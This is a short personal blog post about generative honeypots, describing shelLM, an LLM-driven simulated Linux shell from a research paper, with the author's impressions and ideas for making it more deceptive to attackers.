AI and Cybersecurity:LLM in the Shell: Generative Honeypots

As many of you, I am interested in learning more about AI and how it is transforming cybersecurity. Through a series of posts, I will explore various AI tools and their impact on cybersecurity. These use cases might be helpful to you.

Disclaimer: Everything I cover here and in future articles is based on my personal research and does not reflect the opinions of my current or previous employers.

Generative Honeypots

Honeypots are both fascinating and educational as they allow us to understand attackers better while distracting them. But how can we leverage generative AI for honeypots? A great research paper by Muris Sladi?, Veronica Valeros, Carlos Catania, and Sebastian Garcia explores this concept. You can find it here: https://arxiv.org/abs/2309.00155.

They created shelLM. It is LLM based Linux shell. It’s an innovative idea, and you can clone the GitHub repository here: https://github.com/stratosphereips/shelLM/blob/main/README.md.

I’ve also tested some prompts using the YAML file, and the responses look impressively realistic.

Of course there are more works need to be done. For example, automated behavior analysis of attackers would be a nice feature. Also if you try to ssh into other computers in the network you always get denied. It would be nice to trick attackers further by allowing/simulating them to penetrate more into the network.

In my next post, I’ll cover a web-based honeypot that utilizes large language models (LLMs).